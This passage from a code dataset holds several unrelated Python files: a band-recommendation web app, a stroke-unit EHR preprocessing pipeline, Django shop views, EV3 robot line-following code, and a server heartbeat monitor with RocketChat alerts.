for x in recomendations],['Recomendações de Bandas'])\n\n\ndef plotar_grafico():\n put_markdown(\"# Média de avaliações de artistas\")\n p = figure(x_range=artists, plot_height=250, title=\"Avaliações dos artistas\",\n toolbar_location=None, tools=\"\")\n p.vbar(x=artists, top=avaliation_artists_media, width=0.9)\n\n p.xgrid.grid_line_color = None\n p.y_range.start = 0\n\n show(p)\n put_html('
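The `recommend` helper imported from `correlacaoPearson` is not part of this file. A minimal sketch of Pearson similarity between two users' rating dictionaries, computed over the items both users rated (a hypothetical stand-in, not the project's actual implementation):

```python
from math import sqrt

def pearson(ratings_a: dict, ratings_b: dict) -> float:
    """Pearson correlation over the items both users rated (hypothetical helper)."""
    common = set(ratings_a) & set(ratings_b)
    n = len(common)
    if n == 0:
        return 0.0
    sum_a = sum(ratings_a[i] for i in common)
    sum_b = sum(ratings_b[i] for i in common)
    sum_a2 = sum(ratings_a[i] ** 2 for i in common)
    sum_b2 = sum(ratings_b[i] ** 2 for i in common)
    sum_ab = sum(ratings_a[i] * ratings_b[i] for i in common)
    num = sum_ab - (sum_a * sum_b / n)
    den = sqrt((sum_a2 - sum_a ** 2 / n) * (sum_b2 - sum_b ** 2 / n))
    return num / den if den else 0.0

# Ratings that differ by a constant are perfectly correlated:
print(pearson({'a': 5, 'b': 3, 'c': 1}, {'a': 4, 'b': 2, 'c': 0}))  # 1.0
```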
')\n\n\n\ndef main():\n refactor()\n mediaArtistas()\n output_notebook(notebook_type='pywebio') #\n #start\n\n name = input(\"Qual o seu nome?\", type=TEXT, validate=checkName)\n\n\n if(name != ''):\n put_markdown('## Olá %s, Aqui estão algumas bandas já avaliadas por algumas pessoas!'%name)\n put_table([['Usuários']+artists]+list_of_users)\n\n plotar_grafico()\n\n put_text(\"Deseja avaliar algum artista?\")\n put_buttons(['sim','não'],onclick=partial(btnclick, name))\n\n hold()\n\n\n\nif __name__ == '__main__':\n start_server(main, port=8080, debug=True)\n","repo_name":"silascastro/Sistema-de-recomendacao","sub_path":"recomendation_system/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37497098331","text":"import pandas as pd\nimport os\n\nfrom geneva_stroke_unit_preprocessing.patient_selection.filter_ehr_patients import filter_ehr_patients\nfrom geneva_stroke_unit_preprocessing.patient_selection.restrict_to_patient_selection import restrict_to_patient_selection\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.admission_params_preprocessing import preprocess_admission_data\nfrom geneva_stroke_unit_preprocessing.lab_preprocessing.lab_preprocessing import preprocess_labs\nfrom geneva_stroke_unit_preprocessing.scales_preprocessing.scales_preprocessing import preprocess_scales\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.timing_params_preprocessing import preprocess_timing_params\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.treatment_params_preprocessing import \\\n treatment_params_preprocessing\nfrom geneva_stroke_unit_preprocessing.stroke_registry_params_preprocessing.utils import set_sample_date\nfrom geneva_stroke_unit_preprocessing.utils import create_registry_case_identification_column\nfrom geneva_stroke_unit_preprocessing.variable_assembly.variable_selection import restrict_to_selected_variables\nfrom geneva_stroke_unit_preprocessing.ventilation_preprocessing.ventilation_preprocessing import preprocess_ventilation\nfrom geneva_stroke_unit_preprocessing.vitals_preprocessing.vitals_preprocessing import preprocess_vitals\n\nfrom geneva_stroke_unit_preprocessing.prescription_preprocessing.anti_hypertensive_strategy_extraction import \\\n extract_anti_hypertensive_strategy\n\n\ndef load_data_from_main_dir(data_path: str, file_start: str) -> pd.DataFrame:\n files = [pd.read_csv(os.path.join(data_path, f), delimiter=';', encoding='utf-8',\n dtype=str)\n for f in os.listdir(data_path)\n if f.startswith(file_start)]\n return pd.concat(files, ignore_index=True)\n\n\ndef get_first_sample_date(df):\n datatime_format = '%d.%m.%Y %H:%M'\n df['sample_date_dt'] = pd.to_datetime(df['sample_date'], format=datatime_format)\n first_sample_date = df.groupby('case_admission_id').sample_date_dt.min()\n df.drop(columns=['sample_date_dt'], inplace=True)\n first_sample_date = first_sample_date.reset_index(level=0)\n first_sample_date.rename(columns={'sample_date_dt': 'first_sample_date'}, inplace=True)\n first_sample_date['first_sample_date'] = first_sample_date['first_sample_date'].dt.strftime(datatime_format)\n\n return first_sample_date\n\n\ndef assemble_variable_database(raw_data_path: str, stroke_registry_data_path: str,\n patient_selection_path: str,\n variable_selection_path: str,\n verbose: bool = False,\n use_stroke_registry_data: bool = True,\n log_dir:str = '') -> 
pd.DataFrame:\n \"\"\"\n 1. Restrict to patient selection (done after geneva_stroke_unit_preprocessing for EHR data and before processing for stroke registry data)\n 2. Preprocess EHR and stroke registry data\n 3. Restrict to variable selection\n 4. Assemble database from lab/scales/ventilation/vitals + stroke registry subparts\n\n Args:\n raw_data_path: path to EHR data folder\n stroke_registry_data_path: path to stroke registry data\n patient_selection_path: path to patient selection\n variable_selection_path: path to variable selection (should be same format as in ./selected_variables_example.xlsx)\n verbose: print verbose output\n use_stroke_registry_data: whether to use stroke registry data\n log_dir: directory to save log files\n\n Returns:\n :return: Dataframe with all features under sample_label, value, sample_date, source\n \"\"\"\n # load eds data\n eds_df = pd.read_csv(os.path.join(raw_data_path, 'eds_j1.csv'), delimiter=';', encoding='utf-8',\n dtype=str)\n eds_df = filter_ehr_patients(eds_df, patient_selection_path)\n\n # Load and preprocess lab data\n lab_file_start = 'labo'\n lab_df = load_data_from_main_dir(raw_data_path, lab_file_start)\n lab_df = filter_ehr_patients(lab_df, patient_selection_path)\n preprocessed_lab_df = preprocess_labs(lab_df, verbose=verbose, log_dir=log_dir)\n preprocessed_lab_df = preprocessed_lab_df[['case_admission_id', 'sample_date', 'dosage_label', 'value']]\n preprocessed_lab_df.rename(columns={'dosage_label': 'sample_label'}, inplace=True)\n preprocessed_lab_df['source'] = 'EHR'\n\n # Load and preprocess scales data\n scales_file_start = 'scale'\n scales_df = load_data_from_main_dir(raw_data_path, scales_file_start)\n # Filtering out patients not in patient selection has to be done after geneva_stroke_unit_preprocessing for scale data\n scales_df = preprocess_scales(scales_df, eds_df, patient_selection_path, verbose=verbose)\n scales_df = scales_df[['scale', 'event_date', 'score', 'case_admission_id']]\n scales_df.rename(columns={'scale': 'sample_label', 'score': 'value', 'event_date': 'sample_date'}, inplace=True)\n scales_df['source'] = 'EHR'\n\n # Load and preprocess vitals data\n vitals_file_start = 'patientvalue'\n vitals_df = load_data_from_main_dir(raw_data_path, vitals_file_start)\n vitals_df = filter_ehr_patients(vitals_df, patient_selection_path)\n vitals_df = preprocess_vitals(vitals_df, verbose=verbose)\n vitals_df = vitals_df[['case_admission_id', 'datetime', 'vital_value', 'vital_name']]\n vitals_df.rename(columns={'vital_name': 'sample_label', 'vital_value': 'value', 'datetime': 'sample_date'},\n inplace=True)\n vitals_df['source'] = 'EHR'\n\n # Treatment strategy\n prescription_file_start = 'prescription'\n prescription_df = load_data_from_main_dir(raw_data_path, prescription_file_start)\n prescription_df = filter_ehr_patients(prescription_df, patient_selection_path)\n anti_hypertensive_strategy_df = extract_anti_hypertensive_strategy(prescription_df, interval=60, verbose=verbose)\n anti_hypertensive_strategy_df = anti_hypertensive_strategy_df[['case_admission_id', 'sample_date', 'target_strategy', 'impute_missing_as']]\n anti_hypertensive_strategy_df.rename(columns={'target_strategy': 'value'}, inplace=True)\n anti_hypertensive_strategy_df['sample_label'] = 'anti_hypertensive_strategy'\n anti_hypertensive_strategy_df['source'] = 'EHR'\n\n # Find first sample date in EHR for each patient, this will be used for the inference of FiO2\n intermediate_feature_data = pd.concat([preprocessed_lab_df, scales_df, vitals_df, 
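Every preprocessed source in the function above is reshaped to the same long format (`case_admission_id`, `sample_date`, `sample_label`, `value`, `source`) before concatenation, and `get_first_sample_date` reduces that table to one timestamp per admission. A self-contained sketch of that groupby-min step with toy data:

```python
import pandas as pd

df = pd.DataFrame({
    'case_admission_id': ['A', 'A', 'B'],
    'sample_date': ['02.01.2020 08:00', '01.01.2020 12:30', '03.01.2020 09:15'],
})

fmt = '%d.%m.%Y %H:%M'
df['sample_date_dt'] = pd.to_datetime(df['sample_date'], format=fmt)
first = df.groupby('case_admission_id').sample_date_dt.min().reset_index()
first = first.rename(columns={'sample_date_dt': 'first_sample_date'})
first['first_sample_date'] = first['first_sample_date'].dt.strftime(fmt)
print(first)  # A -> 01.01.2020 12:30, B -> 03.01.2020 09:15
```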
anti_hypertensive_strategy_df], ignore_index=True)\n first_sample_date_df = get_first_sample_date(intermediate_feature_data)\n\n # Load and preprocess ventilation data (this has to be done last, to have access to the first sample date)\n ventilation_file_start = 'ventilation'\n ventilation_df = load_data_from_main_dir(raw_data_path, ventilation_file_start)\n ventilation_df = filter_ehr_patients(ventilation_df, patient_selection_path)\n fio2_df, spo2_df = preprocess_ventilation(ventilation_df, first_sample_date_df, verbose=verbose)\n fio2_df = fio2_df[['case_admission_id', 'FIO2', 'datetime']]\n fio2_df['sample_label'] = 'FIO2'\n fio2_df.rename(columns={'FIO2': 'value', 'datetime': 'sample_date'}, inplace=True)\n fio2_df['source'] = 'EHR'\n spo2_df = spo2_df[['case_admission_id', 'spo2', 'datetime']]\n spo2_df['sample_label'] = 'oxygen_saturation'\n spo2_df.rename(columns={'spo2': 'value', 'datetime': 'sample_date'}, inplace=True)\n spo2_df['source'] = 'EHR'\n\n # Assemble feature database\n feature_database = pd.concat([preprocessed_lab_df, scales_df, fio2_df, spo2_df, vitals_df,\n anti_hypertensive_strategy_df], ignore_index=True)\n feature_database = restrict_to_patient_selection(feature_database, patient_selection_path, verbose=verbose,\n restrict_to_event_period=True)\n\n # Load and preprocess admission data from stroke registry\n if use_stroke_registry_data:\n if verbose:\n print('Preprocessing stroke registry_data')\n # Load stroke registry data and restrict to patient selection\n stroke_registry_df = pd.read_excel(stroke_registry_data_path)\n stroke_registry_df['patient_id'] = stroke_registry_df['Case ID'].apply(lambda x: x[8:-4])\n stroke_registry_df['EDS_last_4_digits'] = stroke_registry_df['Case ID'].apply(lambda x: x[-4:])\n stroke_registry_df['case_admission_id'] = create_registry_case_identification_column(stroke_registry_df)\n\n # set sample date to stroke onset or arrival at hospital, whichever is later\n stroke_registry_df = set_sample_date(stroke_registry_df)\n\n restricted_stroke_registry_df = restrict_to_patient_selection(stroke_registry_df, patient_selection_path,\n verbose=verbose, restrict_to_event_period=False)\n\n admission_data_df = preprocess_admission_data(restricted_stroke_registry_df, verbose=verbose)\n admission_data_df['source'] = 'stroke_registry'\n\n timings_df = preprocess_timing_params(restricted_stroke_registry_df)\n timings_df['source'] = 'stroke_registry'\n\n treatment_data_df = treatment_params_preprocessing(restricted_stroke_registry_df)\n treatment_data_df['source'] = 'stroke_registry'\n\n selected_stroke_registry_data_df = pd.concat([admission_data_df, timings_df, treatment_data_df],\n ignore_index=True)\n\n # Only keep case_admissions that are in the EHR data and in the stroke registry data (intersection)\n # (FIO2 are excluded from this count, as it is inferred from when missing - thus all patients have FIO2)\n ehr_cid_before_restriction_to_registry = feature_database[feature_database.sample_label != 'FIO2']['case_admission_id'].unique()\n intersection_ehr_registry = set(ehr_cid_before_restriction_to_registry)\\\n .intersection(set(selected_stroke_registry_data_df['case_admission_id'].unique()))\n # 1. 
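The cohort restriction later in this function keeps only case admissions present in both the EHR and the registry. The set-intersection pattern in isolation, with toy frames:

```python
import pandas as pd

ehr = pd.DataFrame({'case_admission_id': ['1', '2', '3'], 'value': [10, 20, 30]})
registry = pd.DataFrame({'case_admission_id': ['2', '3', '4'], 'value': [1, 2, 3]})

# Keep only admissions present in both sources, then stack them.
common = set(ehr['case_admission_id']) & set(registry['case_admission_id'])
ehr = ehr[ehr['case_admission_id'].isin(common)]
registry = registry[registry['case_admission_id'].isin(common)]
print(pd.concat([ehr, registry], ignore_index=True))  # only cases '2' and '3' remain
```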
Restrict EHR to intersection (EHR /intersect/ registry)\n feature_database = feature_database[feature_database['case_admission_id'].isin(intersection_ehr_registry)]\n print('Number of cases from EHR data (after restriction to patient selection) not found in registry:',\n len(ehr_cid_before_restriction_to_registry) - len(feature_database[feature_database.sample_label != 'FIO2']['case_admission_id'].unique()))\n # 2. Restrict registry to intersection (EHR /intersect/ registry)\n n_registry_cid_before_restriction_to_ehr = len(selected_stroke_registry_data_df['case_admission_id'].unique())\n selected_stroke_registry_data_df = selected_stroke_registry_data_df[\n selected_stroke_registry_data_df['case_admission_id'].isin(intersection_ehr_registry)]\n print('Number of cases from registry not found in EHR data:', n_registry_cid_before_restriction_to_ehr - len(\n selected_stroke_registry_data_df['case_admission_id'].unique()))\n\n feature_database = pd.concat([feature_database, selected_stroke_registry_data_df], ignore_index=True)\n\n # Restrict to variable selection\n feature_database = restrict_to_selected_variables(feature_database, variable_selection_path, enforce=True)\n\n if log_dir != '':\n # save cids of patients in selection and that are not included in the feature_database\n patient_selection_df = pd.read_csv(patient_selection_path, dtype=str)\n cids_in_selection = set(create_registry_case_identification_column(patient_selection_df).unique())\n cids_in_feature_database = set(feature_database['case_admission_id'].unique())\n cids_not_found_in_feature_database = cids_in_selection.difference(cids_in_feature_database)\n cids_in_database_not_found_in_selection = cids_in_feature_database.difference(cids_in_selection)\n assert len(cids_in_database_not_found_in_selection) == 0, 'Unselected patients found in database'\n cids_not_found_in_feature_database_df = pd.DataFrame(cids_not_found_in_feature_database, columns=['case_admission_id'])\n cids_not_found_in_feature_database_df.to_csv(os.path.join(log_dir, 'missing_cids_from_feature_database.tsv'), sep='\\t', index=False)\n\n return feature_database\n","repo_name":"JulianKlug/Stroke-Unit-Preprocessing","sub_path":"geneva_stroke_unit_preprocessing/variable_assembly/variable_database_assembly.py","file_name":"variable_database_assembly.py","file_ext":"py","file_size_in_byte":12426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1987145392","text":"from datetime import datetime\n\nfrom django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import Group\nfrom shopapp.models import Product, Order\n\n\ndef shop_index(request: HttpRequest) -> HttpResponse:\n products = [\n ('Laptop', 2000),\n ('Smartphone', 3000),\n ('Notebook', 5000),\n ]\n context = {\n 'time_now': datetime.now(),\n 'products': products,\n }\n return render(request, 'shopapp/shop-index.html', context=context)\n\ndef groups_list(request):\n context = {\n 'groups': Group.objects.all()\n }\n return render(request, 'shopapp/groups-list.html', context=context)\n\ndef products_list(request):\n context = {\n 'products': Product.objects.all()\n }\n return render(request, 'shopapp/products-list.html', context=context)\n\ndef order_list(request):\n context = {\n 'orders': Order.objects.select_related('user').prefetch_related('products').all()\n }\n return render(request, 'shopapp/order-list.html', 
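The `order_list` view in the Django record above chains `select_related('user')` (a SQL join for the foreign key) with `prefetch_related('products')` (one extra batched query for the many-to-many), which avoids the N+1 query pattern. A sketch of the difference, meant to run inside a configured Django project; the `username` and `name` attributes are assumptions, since those models are not shown here:

```python
# Runs inside a configured Django project, not as a standalone script.
from shopapp.models import Order

# Naive: one query for the orders, then one per order for .user
# and one per order for .products (the N+1 pattern).
orders = Order.objects.all()

# Optimized, as in order_list above: a join for the FK plus one
# batched query for the many-to-many.
orders = Order.objects.select_related('user').prefetch_related('products')

for order in orders:
    # .username and .name are assumed field names; the models are not shown here.
    print(order.user.username, [p.name for p in order.products.all()])
```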
context=context)","repo_name":"Maroderik1/Python","sub_path":"myproject/shopapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21504147111","text":"#!/usr/bin/env pybricks-micropython\n\n# Importing the required EV3 modules and libraries\n# from pybricks import ev3brick as brick\n# from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor, InfraredSensor, UltrasonicSensor, GyroSensor)\nfrom pybricks.ev3devices import (Motor, ColorSensor)\n# from pybricks.parameters import (Port, Stop, Direction, Button, Color, SoundFile, ImageFile, Align)\nfrom pybricks.parameters import (Port, Stop, Direction)\nfrom pybricks.tools import print, wait, StopWatch\nfrom pybricks.robotics import DriveBase\n\ndef angleToDistance(angle): # Function that returns the distance when the wheels are moved by x degrees\n return angle / 360 * 196.035381584 # Diameter of the wheels.\n\ndef distanceToAngle(distance): # Function that returns the angle by which the wheels need to be moved to move x mm\n return distance * 360 / 196.035381584 # Diameter of the wheels.\n\ndef resetAngles(): # Resets the angles of both Large motors to 0\n left_motor.reset_angle(0)\n right_motor.reset_angle(0)\n\ndef accelerate(start_power, final_power, delay, distance, speed_increment, stop: bool, correct: bool): # Function to accelerate/decelerate from x vel to y vel at z mm/s^2\n resetAngles() # Resetting the angles\n current_power = start_power # Assigning the current power to the start power given as a parameter.\n if speed_increment == 0: # If no speed increment is given or speed increment is 0\n speed_increment = abs(final_power - start_power) / distance * 8 # Assigning the speed increment to be the different of powers divided by the distance.\n resetAngles() # reset angle rotations\n # get desired direction\n try:\n direction_coefficient = final_power / abs(final_power)\n except ZeroDivisionError:\n direction_coefficient = start_power / abs(start_power)\n # while power is less than final power\n while (abs(current_power) < abs(final_power) if abs(current_power) <= abs(final_power) else abs(current_power) > abs(final_power)):\n # move in desired direction at increasing power\n robot.drive(current_power, 0)\n # increment speed\n if ((abs(start_power) <= abs(final_power)) or (abs(start_power) > abs(final_power) and abs(current_power) > 20)):\n print(\"speed increment:\", str(speed_increment), \"increase:\", speed_increment * direction_coefficient * (1 if abs(current_power) <= abs(final_power) else -1))\n current_power += (speed_increment * direction_coefficient * (1 if abs(current_power) <= abs(final_power) else -1))\n # display current movement stats\n print(\"moving, power\", str(current_power), \"left rotations\", str(left_motor.angle()), \"right rotations\", str(right_motor.angle()), \"left distance\", str(angleToDistance(left_motor.angle())), \"right distance\", str(angleToDistance(right_motor.angle())), \"continue?\", (angleToDistance(abs(left_motor.angle())) < distance))\n # wait for specified delay before changing power again\n wait(delay)\n # if desired distance reached, stop increasing power\n if ((abs(angleToDistance(left_motor.angle())) >= distance) or (angleToDistance(abs(right_motor.angle())) >= distance)):\n break\n # keep moving until desired distance reached\n while not ((angleToDistance(abs(left_motor.angle())) >= distance) or (angleToDistance(abs(right_motor.angle())) >= 
distance)):\n wait(delay)\n # if braking desired\n if stop:\n # brake\n robot.stop(Stop.HOLD)\n # if angle correction required\n if correct:\n # correct angle (making robot face correct direction)\n correctRotation(distance)\n\ndef move(steering, speed, amount): # A function to move the robot when steering, speed and amount is given.\n # speed is in mm/s and steering is in degrees/s so time can be calculated\n # reset motor rotations\n resetAngles()\n # if not turning on spot\n if speed != 0:\n # set time to move until desired distance is reached, where amount is a distance in mm\n time = abs(amount / speed * 1000)\n # if turning on spot\n else:\n # set time to move until desired angle is reached, where amount is a distance in degrees\n time = abs(amount / steering * 1000)\n # move for specified time to reach target distance/angle\n robot.drive_time(speed, steering, time)\n # display movement stats\n print(\"moved, left\", left_motor.angle(), \"right\", right_motor.angle())\n\ndef correctRotation(distance): # Function to make sure there is straight movement.\n # The function realligns the robot depending on the rotations the two motors have completed.\n # work out how many degrees need to be moved on each motor\n left_motor_degrees_remaining = abs(left_motor.angle()) - distanceToAngle(distance)\n right_motor_degrees_remaining = abs(right_motor.angle()) - distanceToAngle(distance)\n print(\"left motor degrees remaining:\", str(left_motor_degrees_remaining)) # Displaying the degrees remaining to the console.\n print(\"right motor degrees remaining:\", str(right_motor_degrees_remaining))\n # if motor needs to move\n if (left_motor_degrees_remaining != 0):\n # reset motor rotations\n left_motor.reset_angle(0)\n # move motor required number of degrees\n left_motor.run_angle(5, left_motor_degrees_remaining, Stop.HOLD)\n # if motor needs to move\n if (right_motor_degrees_remaining != 0):\n # reset motor rotations\n right_motor.reset_angle(0)\n # move motor required number of degrees\n right_motor.run_angle(5, right_motor_degrees_remaining, Stop.HOLD)\n\ndef lineFollow(forward: bool, threshold, caller: int): # Function to make the robot follow any line with the robot's two downfacing sensors.\n # Assinging variables that are used in the code below.\n # Soft-coding variables makes it easier to change in the future\n speed = 50 if forward else -50 # Speed at which the robot travels.\n error = 0\n last_error = 0\n integral = 0\n derivative = 0\n kp = 0.6\n ki = 0.02\n\n kd = 0.001\n perfect_steering = 0\n resetAngles()\n \n # run until break\n while True:\n error = left_colour_sensor.reflection() - right_colour_sensor.reflection() # Getting the difference in reflection of the two colour sensors.\n # work out total error\n integral += error\n # predict next error\n derivative = error - last_error\n # work out amount to steer\n steering = error * kp + integral * ki + derivative * kd\n # if turning value is below threshold, increase count of number of times this has happened\n if (threshold != 0 and -2 < steering < 2 and caller != 9):\n perfect_steering += 1\n # if maximum required number of times required reached, stop line following\n if (threshold <= perfect_steering):\n break\n else:\n # move robot\n robot.drive(speed, steering)\n # if called from mission 9 (beams), robot has moved 600 degrees of motor rotation and steering value is above threshold\n if (caller == 9 and left_motor.angle() > 600 and steering >= threshold):\n # print steering stats\n print(\"POSITION 1, steering\", steering)\n # reset 
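`lineFollow` above is a PID controller on the difference between the two reflection sensors. The same update rule in isolation, with the file's gains and hypothetical sensor readings in place of hardware:

```python
# Minimal PID steering update, mirroring lineFollow's gains (kp=0.6, ki=0.02, kd=0.001).
kp, ki, kd = 0.6, 0.02, 0.001
integral = 0.0
last_error = 0.0

# Hypothetical (left, right) reflection readings instead of live sensors:
readings = [(40, 30), (38, 31), (35, 33), (34, 34)]

for left, right in readings:
    error = left - right          # positive -> drifting to one side of the line
    integral += error             # accumulated error
    derivative = error - last_error
    steering = error * kp + integral * ki + derivative * kd
    last_error = error
    print(f"error={error:+d} steering={steering:+.2f}")
```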
motor rotations\n resetAngles()\n # stop line following\n break\n # store last error\n last_error = error\n # brake\n robot.stop(Stop.HOLD)\n # return final steering value\n return steering\n\n# Assinging the modules of the Robot. \n# Two Large Motors.\nleft_motor = Motor(Port.A, Direction.COUNTERCLOCKWISE) # Ports and direction of motion are given as parameters.\nright_motor = Motor(Port.D, Direction.COUNTERCLOCKWISE)\n# The Robot DriveBase\nrobot = DriveBase(left_motor, right_motor, 62.4, 96.5) # The two motors and ... are given as parameters. \n# The two downward facing colour sensors.\nleft_colour_sensor = ColorSensor(Port.S1) # Ports of the sensors are given as a parameter.\nright_colour_sensor = ColorSensor(Port.S2)\n","repo_name":"rs-blackthunder/fll","sub_path":"2019-20/Nationals/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"30664374590","text":"import asyncio\nimport json\nimport logging\nimport sys\nfrom datetime import datetime, timedelta\nfrom inspect import signature\nimport requests\nimport urllib3\nimport yaml\nfrom sqlalchemy import Column, DateTime, Integer, MetaData, String, Table, create_engine\nfrom sqlalchemy.sql.sqltypes import Boolean\n\nurllib3.disable_warnings() # disabling warings about lacking of HTTPS\n\n# Load config file\nwith open(\"example_config.yml\", mode=\"r\") as file:\n config = yaml.full_load(file)\n\n# Logining configuration\nlogging.basicConfig(\n filename=config[\"logs\"][\"filename\"],\n filemode=config[\"logs\"][\"filemode\"],\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S\",\n)\n\n##RocketChat WeebHook and headers##\nurl = config[\"credentials\"][\"ROCKETCHAT\"][\"webhook\"]\nheaders: dict = config[\"credentials\"][\"ROCKETCHAT\"][\"headers\"]\n\n\n# SQL engine and table maping\nengine = create_engine(\n config[\"credentials\"][\"DB\"][\"engine\"]\n + \"://\"\n + config[\"credentials\"][\"DB\"][\"username\"]\n + \":\"\n + config[\"credentials\"][\"DB\"][\"password\"]\n + \"@\"\n + config[\"credentials\"][\"DB\"][\"adress\"]\n + \"/\"\n + config[\"credentials\"][\"DB\"][\"db\"]\n)\nmetadata = MetaData()\n\nhearthbeat = Table(\n config[\"credentials\"][\"DB\"][\"table\"],\n metadata,\n Column(\"server\", String(10)),\n Column(\"date_time\", DateTime),\n Column(\"time_diff\", String(30)),\n Column(\"seconds_diff\", Integer),\n)\n\n\nclass OvRunCheck(object):\n def __init__(\n self,\n name: str,\n adress: str,\n format: str = \"%Y-%m-%d %H:%M:%S\",\n last_run: str = \"1920-01-01T00:00:00.000+02:00\",\n db_save: bool = True,\n notification: bool = True,\n msg_interval: int = 5,\n notification_treshold: int = 15,\n ) -> None:\n \"\"\"\n Timer class used to check content of remote adress\n\n :param name(str): name of server\n :param adress(str): HTTP/HTTPS adress used in GET request\n :param format(str): Default: 'YYYY-MM-DD HH:MM:SS' Format used in .strftime to diplay current time in human form.\n :param last_run(str): Default: '1920-01-01 00:00:00' DateTime from which diff will be calulated.\n :param db_save(bool): Define if changes in computed time should be looged to DB. (Default: True)\n :param notification(bool): Define if notification should be send via RocketChat. (Default: True)\n :param msg_interval(int): Specify how often notification should be send via RocketChat. 
(Default: 5min)\n :param notification_treshold(int): Specify time period after which first notfication will be send (Default: 15min).\n \"\"\"\n self.name = name\n self.adress = adress\n self.format = format\n self.last_run = datetime.fromisoformat(last_run)\n self.db_save = db_save\n self.notification = notification\n self.msg_interval = msg_interval\n self.notification_treshold = notification_treshold\n self.inc = notification_treshold\n\n def __str__(self) -> str:\n fields = signature(self.__init__).parameters\n values = \", \".join(str(getattr(self, f)) for f in fields)\n return f\"\"\"{self.name}({values})\"\"\"\n\n def __repr__(self) -> str:\n return str(self.__dict__)\n\n @property\n def current_time(self):\n try:\n # Ignoring SSL as we do not send reacive anything sensitive\n response = requests.get(self.adress, verify=False).json()\n except requests.exceptions.RequestException:\n logging.error(f\"{self.name} - SSLError {sys.exc_info()[0]}\")\n response = None\n\n if response:\n current_time = datetime.fromisoformat(\n response[\"data_version\"][\"computed_refresh_date\"]\n )\n else:\n current_time = datetime.fromisoformat(\"9999-12-12T00:00:00.000+00:00\")\n return current_time\n\n @property\n def now(self):\n try:\n # Ignoring SSL as we do not send reacive anything sensitive\n response = requests.get(self.adress, verify=False).json()\n except requests.exceptions.RequestException:\n logging.error(f\"{self.name} - SSLError {sys.exc_info()[0]}\")\n response = None\n\n if response:\n now = datetime.fromisoformat(response[\"data_version\"][\"now\"])\n else:\n now = datetime.fromisoformat(\"8999-12-12T00:00:00.000+00:00\")\n return now\n\n def show_time(self) -> str:\n string_time = self.current_time.strftime(self.format)\n print(string_time)\n\n def time_diff(self):\n if self.last_run < self.current_time:\n try:\n diff = self.current_time - self.last_run\n if self.db_save == True:\n ins = hearthbeat.insert().values(\n server=self.name,\n date_time=self.now,\n time_diff=str(diff),\n seconds_diff=diff.total_seconds(),\n )\n try:\n conn = engine.connect()\n insert = conn.execute(ins)\n insert.close()\n except:\n errmsg = f\"{self.name} - Error during save to Database {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n msg = f\"{self.name} - OV run detected, previous run lasted {str(diff)}\"\n logging.info(msg)\n print(msg)\n self.last_run = self.current_time\n self.inc = self.msg_interval\n except:\n errmsg = f\"{self.name} - Unknow error {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n # Exeption need to be replace with more specific, currently don't know what can happen here\n else:\n # This should be split into smaller method/fuction with more specific exeptions.\n # I know it work but it is horrible\n diff = self.now - self.last_run\n if (\n diff > timedelta(minutes=self.notification_treshold)\n and self.notification == True\n and self.inc % self.msg_interval == 0\n ):\n try:\n requests.post(\n url,\n data=json.dumps(\n {\n \"text\": f\"**{self.name}** - Ostatni przebieg OV {str(diff)} temu\"\n }\n ),\n headers=headers,\n )\n except:\n errmsg = f\"{self.name} - Error during sending notification {sys.exc_info()[0]}\"\n logging.error(errmsg)\n print(errmsg)\n msg = f\"{self.name} - No run occured, waiting 60s\"\n logging.info(msg)\n print(msg)\n self.inc += 1\n\n\nserverlist: list = []\n\nprint(\"Application starting\")\nfor key in config[\"servers\"]:\n serverlist.append(\n OvRunCheck(\n name=config[\"servers\"][key][\"name\"],\n 
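The `while_loop` coroutine at the bottom of this script subtracts the time spent polling from the check-up interval so ticks stay evenly spaced. A standalone sketch of that pattern (using `asyncio.run` rather than the script's `get_event_loop`, and clamping the sleep at zero, which the original does not do):

```python
import asyncio
from datetime import datetime

async def periodic(interval: float, ticks: int = 3):
    for _ in range(ticks):
        start = datetime.now()
        print("checking servers...")  # stand-in for server.time_diff()
        elapsed = (datetime.now() - start).total_seconds()
        # max() prevents a negative sleep when the work outruns the interval
        await asyncio.sleep(max(0.0, interval - elapsed))

asyncio.run(periodic(interval=0.2))
```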
adress=config[\"servers\"][key][\"adress\"],\n db_save=config[\"servers\"][key][\"db_save\"],\n notification=config[\"servers\"][key][\"notification\"],\n msg_interval=config[\"servers\"][key][\"msg_interval\"],\n notification_treshold=config[\"servers\"][key][\"notification_treshold\"],\n )\n )\nprint(\"Loaded objects:\")\nfor server in serverlist:\n print(server)\n\nloop = asyncio.get_event_loop()\n\n\nasync def while_loop():\n while True:\n start = datetime.now()\n for server in serverlist:\n server.time_diff()\n end = datetime.now()\n elaps = end - start\n await asyncio.sleep(config[\"main\"][\"checkup_interval\"] - elaps.total_seconds())\n\n\nloop.create_task(while_loop())\nloop.run_forever()\n","repo_name":"Niviral/ServerStatusCheck","sub_path":"log_time.py","file_name":"log_time.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11954082207","text":"from rules import *\n\ndef EnumerateFromStandardForm(rules, n, v):\n t = {}\n for k in range(n+1):\n for r in rules:\n t = evaluateRule(r, rules, k, t, v)\n return t\n\ndef evaluateRule(r, rules, k, table, vals):\n # initialize\n if k not in table:\n table[k] = {}\n\n rule = rules[r]\n\n if isinstance(rule, Set) or (isinstance(rule, KSet) and rule.Rel == \"<=\"):\n if k == 0: table[k][r] = 1.0\n return table\n\n if isinstance(rule, Cycle) 